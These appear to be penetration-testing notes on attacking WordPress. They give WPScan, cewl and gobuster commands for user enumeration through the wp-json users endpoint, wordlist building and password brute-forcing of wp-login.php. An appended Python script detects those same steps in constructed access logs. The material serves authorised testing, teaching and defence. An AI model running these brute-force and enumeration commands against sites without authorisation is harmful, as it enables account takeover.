WordPress
WPScan
wpscan --url ${target}/wordpress/
wpscan --url ${target}/wordpress/ --api-token=.....
wpscan --url ${target}/wordpress/ --api-token=..... -U user.lst -P /usr/share/wordlists/rockyou.txt
API
- http://11.22.33.44/index.php/wp-json/
- http://11.22.33.44/index.php/wp-json/wp/v2/users
Create wordlist (pass.lst)
cewl -w pass.lst ${target}/wordpress -d 2
Create wordlist (user.lst)
- based on /index.php/wp-json/wp/v2/users
Directory enumeration
gobuster dir --url ${target} --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster_wordpress.raw
Brute-force login
wpscan --url ${target}/wordpress -U user.lst -P pass.lst
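Detection (added example)
What the user-list and brute-force steps above leave in a web server access log, as an added example that is not part of the original notes. The log lines are constructed, the combined log format and the threshold of 10 failures are assumptions, and the function and finding names are hypothetical.

```python
import re
from collections import defaultdict

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')
USERS_API = "/wp-json/wp/v2/users"  # endpoint listed on this page
LOGIN_PATH = "/wp-login.php"
FAIL_THRESHOLD = 10                 # assumed value, tune per site

def analyse(lines, threshold=FAIL_THRESHOLD):
    """Return {ip: sorted findings} for a batch of combined-format log lines."""
    fails, findings = defaultdict(int), defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line
        ip, status, path = m["ip"], m["status"], m["path"].split("?")[0]
        if "wpscan" in m["ua"].lower():  # default UA only; trivially changed
            findings[ip].add("wpscan-user-agent")
        if m["method"] == "GET" and USERS_API in path and status == "200":
            findings[ip].add("user-enumeration")
        if m["method"] == "POST" and path.endswith(LOGIN_PATH):
            if status == "200":  # WordPress re-renders the form on a failed login
                fails[ip] += 1
                if fails[ip] >= threshold:
                    findings[ip].add("login-brute-force")
            elif status == "302" and fails[ip] >= threshold:
                findings[ip].add("login-success-after-brute-force")
    return {ip: sorted(f) for ip, f in findings.items()}

def _line(ip, method, path, status, ua="Mozilla/5.0"):
    """Build one constructed log line (sample data, not from a real server)."""
    return (f'{ip} - - [10/Mar/2024:10:00:00 +0000] "{method} {path} HTTP/1.1" '
            f'{status} 512 "-" "{ua}"')

# Constructed sample; the UA string is modelled on WPScan's default format.
WPSCAN_UA = "WPScan v3.8.25 (https://wpscan.com/wordpress-security-scanner)"
SAMPLE = (
    [_line("203.0.113.5", "GET", "/index.php/wp-json/wp/v2/users", 200, WPSCAN_UA)]
    + [_line("203.0.113.5", "POST", "/wordpress/wp-login.php", 200, WPSCAN_UA)] * 12
    + [_line("203.0.113.5", "POST", "/wordpress/wp-login.php", 302, WPSCAN_UA)]
    + [_line("198.51.100.7", "POST", "/wordpress/wp-login.php", 200)] * 2
    + [_line("198.51.100.7", "POST", "/wordpress/wp-login.php", 302)]
)

if __name__ == "__main__":
    for ip, found in analyse(SAMPLE).items():
        print(ip, ", ".join(found))
```

A 302 on wp-login.php after a run of 200s from the same address is the line to triage first, since it marks a login that succeeded during the guessing run.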